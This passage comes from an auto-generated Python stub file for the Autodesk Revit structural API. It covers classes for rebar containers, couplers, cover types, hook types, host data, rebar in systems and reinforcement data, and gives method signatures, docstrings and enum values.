IsValidObject(self: RebarContainerParameterManager) -> bool """ class RebarContainerType(ElementType, IDisposable): """ Represents a Rebar Container Type, used in the generation of Rebar Container. """ @staticmethod def CreateDefaultRebarContainerType(aDoc): """ CreateDefaultRebarContainerType(aDoc: Document) -> ElementId Creates a new RebarContainerType object with a default name. aDoc: The document. Returns: The newly created type id. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass @staticmethod def GetOrCreateRebarContainerType(aDoc, name): """ GetOrCreateRebarContainerType(aDoc: Document, name: str) -> ElementId Creates or returns a RebarContainerType object with a given name. aDoc: The document. name: Name of the type. Returns: The type id. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class RebarCoupler(Element, IDisposable): """ Represents a rebar coupler element in Autodesk Revit. """ def CouplerLinkTwoBars(self): """ CouplerLinkTwoBars(self: RebarCoupler) -> bool returns true if the coupler sits on two rebar and false otherwise """ pass @staticmethod def Create(doc, typeId, pFirstData, pSecondData, error): """ Create(doc: Document, typeId: ElementId, pFirstData: ReinforcementData, pSecondData: ReinforcementData) -> (RebarCoupler, RebarCouplerError) Creates a new instance of a Rebar Coupler element within the project. doc: A document. typeId: type id for coupler pFirstData: information about the first reinforcement to be coupled pSecondData: information about the second reinforcement to be coupled; for the default value, coupler is placed on one reinforcement Returns: The newly created Rebar Coupler instance, or ll if the operation fails. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCoupledReinforcementData(self): """ GetCoupledReinforcementData(self: RebarCoupler) -> IList[ReinforcementData] gets the reinforcement data. If coupler stays on one bar the list will have size = 1. If coupler connects two bars the size will be 2. """ pass def GetCouplerPositionTransform(self, couplerPositionIndex): """ GetCouplerPositionTransform(self: RebarCoupler, couplerPositionIndex: int) -> Transform Return a transform representing the relative position of the coupler at index couplerPositionIndex in the set. couplerPositionIndex: An index between 0 and (CouplerQuantity-1). Returns: The position of a coupler in the set relative (0,0,0). """ pass def GetCouplerQuantity(self): """ GetCouplerQuantity(self: RebarCoupler) -> int Identifies the number of couplers in a set. Returns: Returns the number of couplers in a set. """ pass def GetPointsForPlacement(self): """ GetPointsForPlacement(self: RebarCoupler) -> IList[XYZ] gets the point (or points in case of rebar set) where the coupler is placed """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass CouplerMark = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """gets and sets the coupler mark Get: CouplerMark(self: RebarCoupler) -> str Set: CouplerMark(self: RebarCoupler) = value """ class RebarCouplerError(Enum, IComparable, IFormattable, IConvertible): """ Error states for the Rebar Coupler enum RebarCouplerError, values: BarSegementsAreNotParallel (6), BarSegmentsAreNotOnSameLine (7), BarSegmentSmallerThanEngagement (13), BarsNotTouching (3), CurvesOtherThanLine (12), DifferentLayout (2), InconsistentShape (8), IncorrectEndTreatmentCoupler (5), IncorrectEndTreatmentHook (4), IncorrectInputData (1), InvalidDiameter (9), ValidationSuccessfuly (0), VaryingDistanceBetweenDistributionsBars (14) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BarSegementsAreNotParallel = None BarSegmentsAreNotOnSameLine = None BarSegmentSmallerThanEngagement = None BarsNotTouching = None CurvesOtherThanLine = None DifferentLayout = None InconsistentShape = None IncorrectEndTreatmentCoupler = None IncorrectEndTreatmentHook = None IncorrectInputData = None InvalidDiameter = None ValidationSuccessfuly = None value__ = None VaryingDistanceBetweenDistributionsBars = None class RebarCoverType(ElementType, IDisposable): """ A named value for a clear cover distance. """ @staticmethod def Create(doc, name, coverDistance): """ Create(doc: Document, name: str, coverDistance: float) -> RebarCoverType Creates a new CoverType in the document. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass CoverDistance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A distance that can be used as a concrete cover value in a document. Get: CoverDistance(self: RebarCoverType) -> float Set: CoverDistance(self: RebarCoverType) = value """ class RebarDeformationType(Enum, IComparable, IFormattable, IConvertible): """ Bar deformation type enum RebarDeformationType, values: Deformed (0), Plain (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Deformed = None Plain = None value__ = None class RebarHandleType(Enum, IComparable, IFormattable, IConvertible): """ The various types of handles on a Rebar instance that can be joined to References enum RebarHandleType, values: Edge (3), EndOfBar (2), OutOfPlaneExtent (4), RebarPlane (0), StartOfBar (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Edge = None EndOfBar = None OutOfPlaneExtent = None RebarPlane = None StartOfBar = None value__ = None class RebarHookOrientation(Enum, IComparable, IFormattable, IConvertible): """ Orientation of a rebar hook relative to the path of the Rebar Shape. enum RebarHookOrientation, values: Left (1), Right (-1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Left = None Right = None value__ = None class RebarHookType(ElementType, IDisposable): """ A Rebar Hook type object that is used in the generation of Rebar. """ @staticmethod def Create(doc, angle, multiplier): """ Create(doc: Document, angle: float, multiplier: float) -> RebarHookType Creates a new RebarHookType in a document. angle: Determine the hook angle of new RebarHookType. multiplier: Determine the straight line multiplier of new RebarHookType. """ pass @staticmethod def CreateDefaultRebarHookType(ADoc): """ CreateDefaultRebarHookType(ADoc: Document) -> ElementId Creates a new RebarHookType object with a default name. ADoc: The document. Returns: The newly created type id. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetDefaultHookExtension(self, barDiameter): """ GetDefaultHookExtension(self: RebarHookType, barDiameter: float) -> float Computes the default hook length, which is equal to barDiameter * multiplier. """ pass def GetHookExtensionLength(self, barType): """ GetHookExtensionLength(self: RebarHookType, barType: RebarBarType) -> float Computes the hook extension length based on current hook length """ pass def IsOffsetLengthRequired(self): """ IsOffsetLengthRequired(self: RebarHookType) -> bool Check whether hook offset length is required. remarks: If hook angle is no more than 90 degree, hook offset length is not meaningful. returns: True if hook offset length is required, otherwise false. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass HookAngle = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The hook angle, measured in radians. Must be greater than 0 and no more than pi. Get: HookAngle(self: RebarHookType) -> float Set: HookAngle(self: RebarHookType) = value """ StraightLineMultiplier = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Multiplier of bar diameter. Used to compute a default hook length. The default hook length can be overridden by the RebarBarType class. Get: StraightLineMultiplier(self: RebarHookType) -> float Set: StraightLineMultiplier(self: RebarHookType) = value """ Style = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The hook may only be applied to shapes of the specified style. Get: Style(self: RebarHookType) -> RebarStyle Set: Style(self: RebarHookType) = value """ class RebarHostCategory(Enum, IComparable, IFormattable, IConvertible): """ Rebar host category enum RebarHostCategory, values: Floor (5), Other (0), Part (1), SlabEdge (8), Stairs (7), StructuralColumn (2), StructuralFoundation (6), StructuralFraming (3), Wall (4) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Floor = None Other = None Part = None SlabEdge = None Stairs = None StructuralColumn = None StructuralFoundation = None StructuralFraming = None value__ = None Wall = None class RebarHostData(object, IDisposable): """ Interface to rebar-specific data stored in each valid rebar host element. """ def Dispose(self): """ Dispose(self: RebarHostData) """ pass def GetAreaReinforcementsInHost(self): """ GetAreaReinforcementsInHost(self: RebarHostData) -> IList[AreaReinforcement] Returns all AreaReinforcement elements hosted by the referenced element. """ pass def GetCommonCoverType(self): """ GetCommonCoverType(self: RebarHostData) -> RebarCoverType If all exposed faces of the host have the same associated CoverType, return that CoverType; otherwise, return ll. Returns: The common CoverType for all exposed faces, or ll if there are multiple CoverTypes. """ pass def GetCoverType(self, face): """ GetCoverType(self: RebarHostData, face: Reference) -> RebarCoverType Gets the CoverType associated with a face of the element. Returns: The cover associated with the face, if it is an exposed face. If the face is concealed, returns ll. """ pass def GetExposedFaces(self): """ GetExposedFaces(self: RebarHostData) -> IList[Reference] Returns all the exposed faces, that is, those that have an associated CoverType. """ pass def GetFabricAreasInHost(self): """ GetFabricAreasInHost(self: RebarHostData) -> IList[FabricArea] Returns all FabricArea elements hosted by the referenced element. """ pass def GetFabricSheetsInHost(self): """ GetFabricSheetsInHost(self: RebarHostData) -> IList[FabricSheet] Returns all FabricSheet elements hosted by the referenced element. """ pass def GetPathReinforcementsInHost(self): """ GetPathReinforcementsInHost(self: RebarHostData) -> IList[PathReinforcement] Returns all PathReinforcement elements hosted by the referenced element. """ pass def GetRebarContainersInHost(self): """ GetRebarContainersInHost(self: RebarHostData) -> IList[RebarContainer] Returns all RebarContainer elements hosted by the referenced element. """ pass @staticmethod def GetRebarHostData(host): """ GetRebarHostData(host: Element) -> RebarHostData Gets a RebarHostData object referring to the specified rebar host element. host: An element to host rebar. Returns: A RebarHostData object, or ll. """ pass def GetRebarsInHost(self): """ GetRebarsInHost(self: RebarHostData) -> IList[Rebar] Returns all Rebar elements hosted by the referenced element. """ pass def IsFaceExposed(self, face): """ IsFaceExposed(self: RebarHostData, face: Reference) -> bool Checks whether the specified face is considered exposed, and therefore has an associated CoverType. Returns: True if %face% is exposed, false otherwise. """ pass @staticmethod def IsValidHost(element=None): """ IsValidHost(self: RebarHostData) -> bool Reports whether the element is a valid rebar host. Returns: True if the referenced Element can currently host Rebar elements, false otherwise. IsValidHost(element: Element) -> bool Identifies whether a given element can host reinforcement. element: The element to check. Returns: True if the input Element can host reinforcement elements, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarHostData, disposing: bool) """ pass def SetCommonCoverType(self, coverType): """ SetCommonCoverType(self: RebarHostData, coverType: RebarCoverType) Associate a single CoverType with all exposed faces of the host element. coverType: A CoverType object to be applied to all faces. """ pass def SetCoverType(self, face, coverType): """ SetCoverType(self: RebarHostData, face: Reference, coverType: RebarCoverType) Associates the specified CoverType with the specified face of the element. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarHostData) -> bool """ class RebarInSystem(Element, IDisposable): """ Represents a rebar element that is part of a system. """ def CanApplyPresentationMode(self, dBView): """ CanApplyPresentationMode(self: RebarInSystem, dBView: View) -> bool Checks if a presentation mode can be applied for this rebar in the given view. dBView: The view in which presentation mode will be applied. Returns: True if a presentation mode can be applied for the given view, false otherwise. """ pass def ClearPresentationMode(self, dBView): """ ClearPresentationMode(self: RebarInSystem, dBView: View) Sets the presentation mode for this rebar set to the default (either for a single view, or for all views). dBView: The view where the presentation mode will be cleared. NULL for all views """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def DoesBarExistAtPosition(self, barPosition): """ DoesBarExistAtPosition(self: RebarInSystem, barPosition: int) -> bool Checks whether a bar exists at the specified position. barPosition: A bar position index between 0 and NumberOfBarPositions-1. Returns: Always returns true, since it is not possible to de-activate the first or last bars in a Rebar set that is part of Area or Path Reinforcement. (see includeFirstBar and includeLastBar methods for Rebar) """ pass def FindMatchingPredefinedPresentationMode(self, dBView): """ FindMatchingPredefinedPresentationMode(self: RebarInSystem, dBView: View) -> RebarPresentationMode Determines if there is a matching RebarPresentationMode for the current set of selected hidden and unhidden bars assigned to the given view. dBView: The view. Returns: The presentation mode that matches the current set of selected hidden and unhidden bars. If there is no better match, this returns RebarPresentationMode.Select. """ pass def GetBarPositionTransform(self, barPositionIndex): """ GetBarPositionTransform(self: RebarInSystem, barPositionIndex: int) -> Transform Return a transform representing the relative position of any individual bar in the set. barPositionIndex: An index between 0 and (NumberOfBarPositions-1). Returns: The position of a bar in the set relative to the first position. """ pass def GetBendData(self): """ GetBendData(self: RebarInSystem) -> RebarBendData Gets the RebarBendData, containing bar and hook information, of the instance. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCenterlineCurves(self, adjustForSelfIntersection, suppressHooks, suppressBendRadius): """ GetCenterlineCurves(self: RebarInSystem, adjustForSelfIntersection: bool, suppressHooks: bool, suppressBendRadius: bool) -> IList[Curve] A chain of curves representing the centerline of the rebar. adjustForSelfIntersection: If the curves overlap, as in a planar stirrup, this parameter controls whether they should be adjusted to avoid intersection (as in fine views), or kept in a single plane for simplicity (as in coarse views). suppressHooks: Identifies if the chain will include hooks curves. suppressBendRadius: Identifies if the connected chain will include unfilleted curves. Returns: The centerline curves or empty array if the curves cannot be computed because the parameters values are inconsistent with the constraints of the RebarShape definition. """ pass def GetDistributionPath(self): """ GetDistributionPath(self: RebarInSystem) -> Line The distribution path of a rebar set. Returns: A line beginning at (0, 0, 0) and representing the direction and length of the set. """ pass def GetHookTypeId(self, end): """ GetHookTypeId(self: RebarInSystem, end: int) -> ElementId Get the id of the RebarHookType to be applied to the rebar. end: 0 for the start hook, 1 for the end hook. Returns: The id of a RebarHookType, or invalidElementId if the rebar has no hook at the specified end. """ pass def GetHostId(self): """ GetHostId(self: RebarInSystem) -> ElementId The element that contains the rebar. Returns: The element that the rebar object belongs to, such as a structural wall, floor, foundation, beam, brace or column. """ pass def GetPresentationMode(self, dBView): """ GetPresentationMode(self: RebarInSystem, dBView: View) -> RebarPresentationMode Gets the presentaion mode for this rebar set when displayed in the given view. dBView: The view. Returns: The presentation mode. """ pass def GetReinforcementRoundingManager(self): """ GetReinforcementRoundingManager(self: RebarInSystem) -> RebarRoundingManager Returns an object for managing reinforcement rounding override settings. Returns: The rounding manager. """ pass def HasPresentationOverrides(self, dBView): """ HasPresentationOverrides(self: RebarInSystem, dBView: View) -> bool Identifies if this RebarInSystem has overridden default presentation settings for the given view. dBView: The view. Returns: True if this RebarInSystem has overriden default presentation settings, false otherwise. """ pass def IsBarHidden(self, view, barIndex): """ IsBarHidden(self: RebarInSystem, view: View, barIndex: int) -> bool Identifies if a given bar in this rebar set is hidden in this view. view: The view. barIndex: The index of the bar from this rebar set. Returns: True if the bar is hidden in this view, false otherwise. """ pass def IsRebarInSection(self, dBView): """ IsRebarInSection(self: RebarInSystem, dBView: View) -> bool Identifies if this RebarInSystem is shown as a cross-section in the given view. dBView: The view. Returns: True if this RebarInSystem is shown as a cross-section, false otherwise. """ pass def IsSolidInView(self, view): """ IsSolidInView(self: RebarInSystem, view: View3D) -> bool Checks if this rebar element is shown solidly in a 3D view. view: The 3D view element Returns: True if rebar is shown solidly, false otherwise. """ pass def IsUnobscuredInView(self, view): """ IsUnobscuredInView(self: RebarInSystem, view: View) -> bool Checks if this rebar element is shown unobscured in a view. view: The view element Returns: True if rebar is shown unobscured, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def SetBarHiddenStatus(self, view, barIndex, hide): """ SetBarHiddenStatus(self: RebarInSystem, view: View, barIndex: int, hide: bool) Sets the bar in this rebar set to be hidden or unhidden in the given view. view: The view. barIndex: The index of the bar from this set. hide: True to hide this bar in the view, false to unhide the bar. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetPresentationMode(self, dBView, presentationMode): """ SetPresentationMode(self: RebarInSystem, dBView: View, presentationMode: RebarPresentationMode) Sets the presentation mode for this rebar set when displayed in the given view. dBView: The view. presentationMode: The presentation mode. """ pass def SetSolidInView(self, view, solid): """ SetSolidInView(self: RebarInSystem, view: View3D, solid: bool) Sets this rebar element to be shown solidly in a 3D view. view: The 3D view element solid: True if rebar element is shown solidly, false otherwise. """ pass def SetUnobscuredInView(self, view, unobscured): """ SetUnobscuredInView(self: RebarInSystem, view: View, unobscured: bool) Sets RebarInSystem element to be shown unobscured in a view. view: The view element unobscured: True if RebarInSystem element is shown unobscured, false otherwise. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass ArrayLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the distribution path length of rebar set. Get: ArrayLength(self: RebarInSystem) -> float """ BarsOnNormalSide = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal. For the current implementation of RebarInSystem, this property will always return true, but it is included in the RebarInSystem interface for consistency with the Rebar class. Get: BarsOnNormalSide(self: RebarInSystem) -> bool """ LayoutRule = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the layout rule of rebar set. Get: LayoutRule(self: RebarInSystem) -> RebarLayoutRule """ MaxSpacing = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the maximum spacing between rebar in rebar set. Get: MaxSpacing(self: RebarInSystem) -> float """ Normal = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A unit-length vector normal to the plane of the rebar Get: Normal(self: RebarInSystem) -> XYZ """ NumberOfBarPositions = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The number of bar positions available in the rebar. Get: NumberOfBarPositions(self: RebarInSystem) -> int """ Quantity = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the number of bars in rebar set. For the current implementation of RebarInSystem, this property will always return the same number as NumberOfBarPositions, since the first and last bars of a RebarInSystem set cannot be suppressed. However, it is included in the RebarInSystem interface for consistency with the Rebar class. Get: Quantity(self: RebarInSystem) -> int """ RebarShapeId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The RebarShape element that defines the shape of the rebar. Get: RebarShapeId(self: RebarInSystem) -> ElementId """ ScheduleMark = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Schedule Mark parameter. On creation, the Schedule Mark is set to a value that is unique to the host, but it can be set to any value. Get: ScheduleMark(self: RebarInSystem) -> str Set: ScheduleMark(self: RebarInSystem) = value """ SystemId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Id of an AreaReinforcement or PathReinforcement element that owns this element. Get: SystemId(self: RebarInSystem) -> ElementId """ TotalLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The length of an individual bar multiplied by Quantity. Get: TotalLength(self: RebarInSystem) -> float """ Volume = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The volume of an individual bar multiplied by Quantity. Get: Volume(self: RebarInSystem) -> float """ class RebarLayoutRule(Enum, IComparable, IFormattable, IConvertible): """ The rule for how the rebars in rebar set are laid out enum RebarLayoutRule, values: FixedNumber (1), MaximumSpacing (2), MinimumClearSpacing (4), NumberWithSpacing (3), Single (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass FixedNumber = None MaximumSpacing = None MinimumClearSpacing = None NumberWithSpacing = None Single = None value__ = None class RebarPresentationMode(Enum, IComparable, IFormattable, IConvertible): """ Bar presentation mode enum RebarPresentationMode, values: All (0), FirstLast (1), Middle (2), Select (3) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass All = None FirstLast = None Middle = None Select = None value__ = None class ReinforcementData(object, IDisposable): """ Abstract class for various reinforcement data """ def Dispose(self): """ Dispose(self: ReinforcementData) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ReinforcementData, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: ReinforcementData) -> bool """ class RebarReinforcementData(ReinforcementData, IDisposable): """ class containing the id and the end of rebar on which the coupler stays """ @staticmethod def Create(rebarId, iEnd): """ Create(rebarId: ElementId, iEnd: int) -> RebarReinforcementData Creates a new instance of RebarReinforcementData, or ll if the operation fails. rebarId: the Id of the rebar iEnd: The end of rebar where the coupler stays. This should be 0 or 1 Returns: Creates a new instance of RebarReinforcementData """ pass def Dispose(self): """ Dispose(self: ReinforcementData, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ReinforcementData, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass End = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The end of the rebar. The end should be 0 or 1. Get: End(self: RebarReinforcementData) -> int Set: End(self: RebarReinforcementData) = value """ RebarId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the Rebar Get: RebarId(self: RebarReinforcementData) -> ElementId Set: RebarId(self: RebarReinforcementData) = value """ class RebarRoundingManager(ReinforcementRoundingManager, 